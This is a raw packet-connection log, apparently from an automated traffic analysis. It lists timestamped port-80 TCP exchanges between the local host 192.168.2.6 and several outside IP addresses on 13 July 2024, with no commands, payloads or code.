                                                          Jul 13, 2024 00:03:51.742094994 CEST80497373.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:03:51.744266987 CEST4973780192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:03:52.769722939 CEST4973780192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:03:52.775872946 CEST80497373.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:03:53.792696953 CEST4973880192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:03:53.799676895 CEST80497383.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:03:53.799814939 CEST4973880192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:03:53.802059889 CEST4973880192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:03:53.808953047 CEST80497383.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:03:54.261599064 CEST80497383.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:03:54.263277054 CEST80497383.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:03:54.263400078 CEST4973880192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:03:54.264425039 CEST4973880192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:03:54.272732973 CEST80497383.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:03:59.290575981 CEST4973980192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:03:59.296294928 CEST80497393.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:03:59.296370029 CEST4973980192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:03:59.298512936 CEST4973980192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:03:59.303881884 CEST80497393.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:03:59.779040098 CEST80497393.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:03:59.779520988 CEST4973980192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:04:00.800756931 CEST4973980192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:04:00.805732012 CEST80497393.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:04:01.818789005 CEST4974080192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:04:01.824156046 CEST80497403.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:04:01.824567080 CEST4974080192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:04:01.828516960 CEST4974080192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:04:01.833395004 CEST80497403.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:04:03.332024097 CEST4974080192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:04:03.339368105 CEST80497403.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:04:03.339418888 CEST4974080192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:04:04.350075960 CEST4974180192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:04:04.356331110 CEST80497413.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:04:04.359688044 CEST4974180192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:04:04.359688044 CEST4974180192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:04:04.365782022 CEST80497413.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:04:04.366827965 CEST80497413.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:04:05.742002010 CEST80497413.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:04:05.742980003 CEST4974180192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:04:05.864594936 CEST4974180192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:04:05.870738983 CEST80497413.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:04:06.882499933 CEST4974380192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:04:06.887485027 CEST80497433.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:04:06.887557983 CEST4974380192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:04:06.889780998 CEST4974380192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:04:06.894771099 CEST80497433.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:04:07.348738909 CEST80497433.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:04:07.348938942 CEST80497433.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:04:07.348988056 CEST4974380192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:04:07.351794004 CEST4974380192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:04:07.356678009 CEST80497433.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:04:12.442085028 CEST4974480192.168.2.651.89.93.192
                                                          Jul 13, 2024 00:04:12.447098970 CEST804974451.89.93.192192.168.2.6
                                                          Jul 13, 2024 00:04:12.451656103 CEST4974480192.168.2.651.89.93.192
                                                          Jul 13, 2024 00:04:12.451656103 CEST4974480192.168.2.651.89.93.192
                                                          Jul 13, 2024 00:04:12.456870079 CEST804974451.89.93.192192.168.2.6
                                                          Jul 13, 2024 00:04:13.092093945 CEST804974451.89.93.192192.168.2.6
                                                          Jul 13, 2024 00:04:13.092156887 CEST804974451.89.93.192192.168.2.6
                                                          Jul 13, 2024 00:04:13.092190981 CEST804974451.89.93.192192.168.2.6
                                                          Jul 13, 2024 00:04:13.092235088 CEST4974480192.168.2.651.89.93.192
                                                          Jul 13, 2024 00:04:13.092235088 CEST4974480192.168.2.651.89.93.192
                                                          Jul 13, 2024 00:04:13.957597971 CEST4974480192.168.2.651.89.93.192
                                                          Jul 13, 2024 00:04:14.976349115 CEST4974580192.168.2.651.89.93.192
                                                          Jul 13, 2024 00:04:14.981895924 CEST804974551.89.93.192192.168.2.6
                                                          Jul 13, 2024 00:04:14.981980085 CEST4974580192.168.2.651.89.93.192
                                                          Jul 13, 2024 00:04:14.984235048 CEST4974580192.168.2.651.89.93.192
                                                          Jul 13, 2024 00:04:14.989387989 CEST804974551.89.93.192192.168.2.6
                                                          Jul 13, 2024 00:04:15.616523027 CEST804974551.89.93.192192.168.2.6
                                                          Jul 13, 2024 00:04:15.616588116 CEST804974551.89.93.192192.168.2.6
                                                          Jul 13, 2024 00:04:15.616630077 CEST804974551.89.93.192192.168.2.6
                                                          Jul 13, 2024 00:04:15.616739035 CEST4974580192.168.2.651.89.93.192
                                                          Jul 13, 2024 00:04:16.488280058 CEST4974580192.168.2.651.89.93.192
                                                          Jul 13, 2024 00:04:17.506330967 CEST4974680192.168.2.651.89.93.192
                                                          Jul 13, 2024 00:04:17.511483908 CEST804974651.89.93.192192.168.2.6
                                                          Jul 13, 2024 00:04:17.514163971 CEST4974680192.168.2.651.89.93.192
                                                          Jul 13, 2024 00:04:17.518085957 CEST4974680192.168.2.651.89.93.192
                                                          Jul 13, 2024 00:04:17.522989988 CEST804974651.89.93.192192.168.2.6
                                                          Jul 13, 2024 00:04:17.523998976 CEST804974651.89.93.192192.168.2.6
                                                          Jul 13, 2024 00:04:18.154594898 CEST804974651.89.93.192192.168.2.6
                                                          Jul 13, 2024 00:04:18.154643059 CEST804974651.89.93.192192.168.2.6
                                                          Jul 13, 2024 00:04:18.154654026 CEST804974651.89.93.192192.168.2.6
                                                          Jul 13, 2024 00:04:18.156649113 CEST4974680192.168.2.651.89.93.192
                                                          Jul 13, 2024 00:04:19.019504070 CEST4974680192.168.2.651.89.93.192
                                                          Jul 13, 2024 00:04:20.040532112 CEST4974780192.168.2.651.89.93.192
                                                          Jul 13, 2024 00:04:20.045718908 CEST804974751.89.93.192192.168.2.6
                                                          Jul 13, 2024 00:04:20.050184965 CEST4974780192.168.2.651.89.93.192
                                                          Jul 13, 2024 00:04:20.054097891 CEST4974780192.168.2.651.89.93.192
                                                          Jul 13, 2024 00:04:20.058967113 CEST804974751.89.93.192192.168.2.6
                                                          Jul 13, 2024 00:04:20.682537079 CEST804974751.89.93.192192.168.2.6
                                                          Jul 13, 2024 00:04:20.682598114 CEST804974751.89.93.192192.168.2.6
                                                          Jul 13, 2024 00:04:20.682636023 CEST804974751.89.93.192192.168.2.6
                                                          Jul 13, 2024 00:04:20.682670116 CEST804974751.89.93.192192.168.2.6
                                                          Jul 13, 2024 00:04:20.682696104 CEST4974780192.168.2.651.89.93.192
                                                          Jul 13, 2024 00:04:20.682709932 CEST804974751.89.93.192192.168.2.6
                                                          Jul 13, 2024 00:04:20.682724953 CEST4974780192.168.2.651.89.93.192
                                                          Jul 13, 2024 00:04:20.682754993 CEST4974780192.168.2.651.89.93.192
                                                          Jul 13, 2024 00:04:20.687918901 CEST4974780192.168.2.651.89.93.192
                                                          Jul 13, 2024 00:04:20.692867994 CEST804974751.89.93.192192.168.2.6
                                                          Jul 13, 2024 00:04:25.720523119 CEST4974880192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:04:25.728102922 CEST80497483.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:04:25.728537083 CEST4974880192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:04:25.730942011 CEST4974880192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:04:25.737266064 CEST80497483.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:04:26.206804037 CEST80497483.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:04:26.210694075 CEST4974880192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:04:27.238250017 CEST4974880192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:04:27.243102074 CEST80497483.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:04:28.256640911 CEST4974980192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:04:28.262466908 CEST80497493.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:04:28.264620066 CEST4974980192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:04:28.268542051 CEST4974980192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:04:28.273515940 CEST80497493.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:04:29.664052010 CEST80497493.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:04:29.671358109 CEST4974980192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:04:29.771295071 CEST4974980192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:04:29.777846098 CEST80497493.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:04:30.788647890 CEST4975080192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:04:30.794909954 CEST80497503.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:04:30.794989109 CEST4975080192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:04:30.797411919 CEST4975080192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:04:30.803155899 CEST80497503.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:04:30.804467916 CEST80497503.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:04:31.252399921 CEST80497503.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:04:31.252461910 CEST4975080192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:04:32.300785065 CEST4975080192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:04:32.316134930 CEST80497503.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:04:33.319346905 CEST4975180192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:04:33.325869083 CEST80497513.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:04:33.325934887 CEST4975180192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:04:33.327718019 CEST4975180192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:04:33.334037066 CEST80497513.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:04:33.785254955 CEST80497513.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:04:33.788228989 CEST80497513.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:04:33.788527012 CEST4975180192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:04:33.816519976 CEST4975180192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:04:33.824390888 CEST80497513.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:04:38.861799002 CEST4975280192.168.2.6188.114.96.3
                                                          Jul 13, 2024 00:04:38.870249033 CEST8049752188.114.96.3192.168.2.6
                                                          Jul 13, 2024 00:04:38.870325089 CEST4975280192.168.2.6188.114.96.3
                                                          Jul 13, 2024 00:04:38.881293058 CEST4975280192.168.2.6188.114.96.3
                                                          Jul 13, 2024 00:04:38.889267921 CEST8049752188.114.96.3192.168.2.6
                                                          Jul 13, 2024 00:04:39.340420008 CEST8049752188.114.96.3192.168.2.6
                                                          Jul 13, 2024 00:04:39.343009949 CEST8049752188.114.96.3192.168.2.6
                                                          Jul 13, 2024 00:04:39.343086958 CEST4975280192.168.2.6188.114.96.3
                                                          Jul 13, 2024 00:04:40.396563053 CEST4975280192.168.2.6188.114.96.3
                                                          Jul 13, 2024 00:04:41.413079977 CEST4975380192.168.2.6188.114.96.3
                                                          Jul 13, 2024 00:04:41.419527054 CEST8049753188.114.96.3192.168.2.6
                                                          Jul 13, 2024 00:04:41.419589043 CEST4975380192.168.2.6188.114.96.3
                                                          Jul 13, 2024 00:04:41.421397924 CEST4975380192.168.2.6188.114.96.3
                                                          Jul 13, 2024 00:04:41.429691076 CEST8049753188.114.96.3192.168.2.6
                                                          Jul 13, 2024 00:04:41.899492979 CEST8049753188.114.96.3192.168.2.6
                                                          Jul 13, 2024 00:04:41.900628090 CEST8049753188.114.96.3192.168.2.6
                                                          Jul 13, 2024 00:04:41.900717020 CEST4975380192.168.2.6188.114.96.3
                                                          Jul 13, 2024 00:04:42.925743103 CEST4975380192.168.2.6188.114.96.3
                                                          Jul 13, 2024 00:04:43.944539070 CEST4975480192.168.2.6188.114.96.3
                                                          Jul 13, 2024 00:04:43.953843117 CEST8049754188.114.96.3192.168.2.6
                                                          Jul 13, 2024 00:04:43.955631018 CEST4975480192.168.2.6188.114.96.3
                                                          Jul 13, 2024 00:04:43.955631018 CEST4975480192.168.2.6188.114.96.3
                                                          Jul 13, 2024 00:04:43.964313030 CEST8049754188.114.96.3192.168.2.6
                                                          Jul 13, 2024 00:04:43.964797974 CEST8049754188.114.96.3192.168.2.6
                                                          Jul 13, 2024 00:04:44.435503006 CEST8049754188.114.96.3192.168.2.6
                                                          Jul 13, 2024 00:04:44.436600924 CEST8049754188.114.96.3192.168.2.6
                                                          Jul 13, 2024 00:04:44.444545031 CEST4975480192.168.2.6188.114.96.3
                                                          Jul 13, 2024 00:04:45.457159996 CEST4975480192.168.2.6188.114.96.3
                                                          Jul 13, 2024 00:04:46.474822998 CEST4975580192.168.2.6188.114.96.3
                                                          Jul 13, 2024 00:04:46.480170965 CEST8049755188.114.96.3192.168.2.6
                                                          Jul 13, 2024 00:04:46.480737925 CEST4975580192.168.2.6188.114.96.3
                                                          Jul 13, 2024 00:04:46.484648943 CEST4975580192.168.2.6188.114.96.3
                                                          Jul 13, 2024 00:04:46.490303040 CEST8049755188.114.96.3192.168.2.6
                                                          Jul 13, 2024 00:04:46.941668034 CEST8049755188.114.96.3192.168.2.6
                                                          Jul 13, 2024 00:04:46.943556070 CEST8049755188.114.96.3192.168.2.6
                                                          Jul 13, 2024 00:04:46.943643093 CEST4975580192.168.2.6188.114.96.3
                                                          Jul 13, 2024 00:04:46.944426060 CEST4975580192.168.2.6188.114.96.3
                                                          Jul 13, 2024 00:04:46.951555014 CEST8049755188.114.96.3192.168.2.6
                                                          Jul 13, 2024 00:04:52.308518887 CEST4975680192.168.2.645.130.41.38
                                                          Jul 13, 2024 00:04:52.315694094 CEST804975645.130.41.38192.168.2.6
                                                          Jul 13, 2024 00:04:52.316006899 CEST4975680192.168.2.645.130.41.38
                                                          Jul 13, 2024 00:04:52.320529938 CEST4975680192.168.2.645.130.41.38
                                                          Jul 13, 2024 00:04:52.326843977 CEST804975645.130.41.38192.168.2.6
                                                          Jul 13, 2024 00:04:53.028438091 CEST804975645.130.41.38192.168.2.6
                                                          Jul 13, 2024 00:04:53.028507948 CEST804975645.130.41.38192.168.2.6
                                                          Jul 13, 2024 00:04:53.028578997 CEST4975680192.168.2.645.130.41.38
                                                          Jul 13, 2024 00:04:53.832101107 CEST4975680192.168.2.645.130.41.38
                                                          Jul 13, 2024 00:04:54.850604057 CEST4975780192.168.2.645.130.41.38
                                                          Jul 13, 2024 00:04:54.856791973 CEST804975745.130.41.38192.168.2.6
                                                          Jul 13, 2024 00:04:54.856863022 CEST4975780192.168.2.645.130.41.38
                                                          Jul 13, 2024 00:04:54.858742952 CEST4975780192.168.2.645.130.41.38
                                                          Jul 13, 2024 00:04:54.865078926 CEST804975745.130.41.38192.168.2.6
                                                          Jul 13, 2024 00:04:55.566567898 CEST804975745.130.41.38192.168.2.6
                                                          Jul 13, 2024 00:04:55.566652060 CEST804975745.130.41.38192.168.2.6
                                                          Jul 13, 2024 00:04:55.566701889 CEST4975780192.168.2.645.130.41.38
                                                          Jul 13, 2024 00:04:56.364134073 CEST4975780192.168.2.645.130.41.38
                                                          Jul 13, 2024 00:04:57.381856918 CEST4975880192.168.2.645.130.41.38
                                                          Jul 13, 2024 00:04:57.388559103 CEST804975845.130.41.38192.168.2.6
                                                          Jul 13, 2024 00:04:57.388636112 CEST4975880192.168.2.645.130.41.38
                                                          Jul 13, 2024 00:04:57.390508890 CEST4975880192.168.2.645.130.41.38
                                                          Jul 13, 2024 00:04:57.396811008 CEST804975845.130.41.38192.168.2.6
                                                          Jul 13, 2024 00:04:57.398422003 CEST804975845.130.41.38192.168.2.6
                                                          Jul 13, 2024 00:04:58.235800982 CEST804975845.130.41.38192.168.2.6
                                                          Jul 13, 2024 00:04:58.235846996 CEST804975845.130.41.38192.168.2.6
                                                          Jul 13, 2024 00:04:58.242263079 CEST4975880192.168.2.645.130.41.38
                                                          Jul 13, 2024 00:04:58.894623995 CEST4975880192.168.2.645.130.41.38
                                                          Jul 13, 2024 00:04:59.912451982 CEST4975980192.168.2.645.130.41.38
                                                          Jul 13, 2024 00:05:00.038758993 CEST804975945.130.41.38192.168.2.6
                                                          Jul 13, 2024 00:05:00.043647051 CEST4975980192.168.2.645.130.41.38
                                                          Jul 13, 2024 00:05:00.043647051 CEST4975980192.168.2.645.130.41.38
                                                          Jul 13, 2024 00:05:00.048690081 CEST804975945.130.41.38192.168.2.6
                                                          Jul 13, 2024 00:05:00.780504942 CEST804975945.130.41.38192.168.2.6
                                                          Jul 13, 2024 00:05:00.780628920 CEST804975945.130.41.38192.168.2.6
                                                          Jul 13, 2024 00:05:00.780703068 CEST4975980192.168.2.645.130.41.38
                                                          Jul 13, 2024 00:05:00.783267975 CEST4975980192.168.2.645.130.41.38
                                                          Jul 13, 2024 00:05:00.789743900 CEST804975945.130.41.38192.168.2.6
                                                          Jul 13, 2024 00:05:06.012540102 CEST4976080192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:05:06.017540932 CEST80497603.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:05:06.023060083 CEST4976080192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:05:06.023060083 CEST4976080192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:05:06.030365944 CEST80497603.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:05:06.489455938 CEST80497603.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:05:06.492536068 CEST4976080192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:05:07.535376072 CEST4976080192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:05:07.541213989 CEST80497603.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:05:08.553622007 CEST4976180192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:05:08.559952974 CEST80497613.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:05:08.562771082 CEST4976180192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:05:08.562772036 CEST4976180192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:05:08.569382906 CEST80497613.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:05:10.023957014 CEST80497613.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:05:10.024193048 CEST4976180192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:05:10.024528027 CEST80497613.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:05:10.024852037 CEST80497613.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:05:10.024853945 CEST4976180192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:05:10.025284052 CEST80497613.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:05:10.025366068 CEST4976180192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:05:10.025366068 CEST4976180192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:05:10.069233894 CEST4976180192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:05:10.209520102 CEST80497613.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:05:11.085272074 CEST4976280192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:05:11.090270996 CEST80497623.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:05:11.090342045 CEST4976280192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:05:11.092232943 CEST4976280192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:05:11.099102020 CEST80497623.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:05:11.099431038 CEST80497623.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:05:11.620640039 CEST80497623.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:05:11.626144886 CEST4976280192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:05:12.598136902 CEST4976280192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:05:12.604756117 CEST80497623.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:05:13.618124008 CEST4976380192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:05:14.255074978 CEST80497633.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:05:14.257771969 CEST4976380192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:05:14.257771969 CEST4976380192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:05:14.262686968 CEST80497633.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:05:14.849314928 CEST80497633.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:05:14.849359035 CEST80497633.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:05:14.849481106 CEST4976380192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:05:14.849873066 CEST80497633.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:05:14.849921942 CEST4976380192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:05:14.851561069 CEST4976380192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:05:14.856941938 CEST80497633.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:05:20.559209108 CEST4976580192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:05:20.563992023 CEST80497653.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:05:20.564548016 CEST4976580192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:05:20.588257074 CEST4976580192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:05:20.593352079 CEST80497653.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:05:21.077316046 CEST80497653.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:05:21.077383995 CEST4976580192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:05:22.100563049 CEST4976580192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:05:22.105459929 CEST80497653.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:05:23.152359962 CEST4976680192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:05:23.157370090 CEST80497663.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:05:23.157438040 CEST4976680192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:05:23.159934044 CEST4976680192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:05:23.164693117 CEST80497663.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:05:23.617144108 CEST80497663.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:05:23.617209911 CEST4976680192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:05:24.675857067 CEST4976680192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:05:24.681090117 CEST80497663.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:05:25.701396942 CEST4976780192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:05:25.707678080 CEST80497673.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:05:25.711738110 CEST4976780192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:05:25.711738110 CEST4976780192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:05:25.718148947 CEST80497673.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:05:25.719316959 CEST80497673.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:05:27.108320951 CEST80497673.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:05:27.108500957 CEST4976780192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:05:27.222726107 CEST4976780192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:05:27.228734970 CEST80497673.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:05:28.241754055 CEST4976880192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:05:28.247108936 CEST80497683.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:05:28.251796961 CEST4976880192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:05:28.251796961 CEST4976880192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:05:28.256897926 CEST80497683.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:05:28.717616081 CEST80497683.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:05:28.717665911 CEST80497683.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:05:28.717911005 CEST4976880192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:05:28.719793081 CEST4976880192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:05:28.724914074 CEST80497683.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:05:33.772521973 CEST4976980192.168.2.6103.176.91.154
                                                          Jul 13, 2024 00:05:33.778633118 CEST8049769103.176.91.154192.168.2.6
                                                          Jul 13, 2024 00:05:33.782044888 CEST4976980192.168.2.6103.176.91.154
                                                          Jul 13, 2024 00:05:33.782044888 CEST4976980192.168.2.6103.176.91.154
                                                          Jul 13, 2024 00:05:33.788681984 CEST8049769103.176.91.154192.168.2.6
                                                          Jul 13, 2024 00:05:34.592546940 CEST8049769103.176.91.154192.168.2.6
                                                          Jul 13, 2024 00:05:34.642036915 CEST8049769103.176.91.154192.168.2.6
                                                          Jul 13, 2024 00:05:34.644329071 CEST4976980192.168.2.6103.176.91.154
                                                          Jul 13, 2024 00:05:35.285388947 CEST4976980192.168.2.6103.176.91.154
                                                          Jul 13, 2024 00:05:36.302817106 CEST4977080192.168.2.6103.176.91.154
                                                          Jul 13, 2024 00:05:36.309803963 CEST8049770103.176.91.154192.168.2.6
                                                          Jul 13, 2024 00:05:36.310033083 CEST4977080192.168.2.6103.176.91.154
                                                          Jul 13, 2024 00:05:36.312694073 CEST4977080192.168.2.6103.176.91.154
                                                          Jul 13, 2024 00:05:36.319719076 CEST8049770103.176.91.154192.168.2.6
                                                          Jul 13, 2024 00:05:37.102924109 CEST8049770103.176.91.154192.168.2.6
                                                          Jul 13, 2024 00:05:37.144515038 CEST4977080192.168.2.6103.176.91.154
                                                          Jul 13, 2024 00:05:37.164050102 CEST8049770103.176.91.154192.168.2.6
                                                          Jul 13, 2024 00:05:37.164165974 CEST4977080192.168.2.6103.176.91.154
                                                          Jul 13, 2024 00:05:37.816427946 CEST4977080192.168.2.6103.176.91.154
                                                          Jul 13, 2024 00:05:38.835009098 CEST4977180192.168.2.6103.176.91.154
                                                          Jul 13, 2024 00:05:38.842077971 CEST8049771103.176.91.154192.168.2.6
                                                          Jul 13, 2024 00:05:38.842156887 CEST4977180192.168.2.6103.176.91.154
                                                          Jul 13, 2024 00:05:38.844029903 CEST4977180192.168.2.6103.176.91.154
                                                          Jul 13, 2024 00:05:38.851224899 CEST8049771103.176.91.154192.168.2.6
                                                          Jul 13, 2024 00:05:38.853665113 CEST8049771103.176.91.154192.168.2.6
                                                          Jul 13, 2024 00:05:39.668555975 CEST8049771103.176.91.154192.168.2.6
                                                          Jul 13, 2024 00:05:39.724476099 CEST4977180192.168.2.6103.176.91.154
                                                          Jul 13, 2024 00:05:39.918134928 CEST8049771103.176.91.154192.168.2.6
                                                          Jul 13, 2024 00:05:39.918258905 CEST8049771103.176.91.154192.168.2.6
                                                          Jul 13, 2024 00:05:39.918766975 CEST4977180192.168.2.6103.176.91.154
                                                          Jul 13, 2024 00:05:40.348532915 CEST4977180192.168.2.6103.176.91.154
                                                          Jul 13, 2024 00:05:41.365673065 CEST4977280192.168.2.6103.176.91.154
                                                          Jul 13, 2024 00:05:41.370794058 CEST8049772103.176.91.154192.168.2.6
                                                          Jul 13, 2024 00:05:41.370862007 CEST4977280192.168.2.6103.176.91.154
                                                          Jul 13, 2024 00:05:41.372349024 CEST4977280192.168.2.6103.176.91.154
                                                          Jul 13, 2024 00:05:41.377191067 CEST8049772103.176.91.154192.168.2.6
                                                          Jul 13, 2024 00:05:42.187021017 CEST8049772103.176.91.154192.168.2.6
                                                          Jul 13, 2024 00:05:42.236521006 CEST8049772103.176.91.154192.168.2.6
                                                          Jul 13, 2024 00:05:42.240521908 CEST4977280192.168.2.6103.176.91.154
                                                          Jul 13, 2024 00:05:42.241252899 CEST4977280192.168.2.6103.176.91.154
                                                          Jul 13, 2024 00:05:42.241252899 CEST4977280192.168.2.6103.176.91.154
                                                          Jul 13, 2024 00:05:42.246167898 CEST8049772103.176.91.154192.168.2.6
                                                          Jul 13, 2024 00:05:47.277614117 CEST4977380192.168.2.65.78.41.174
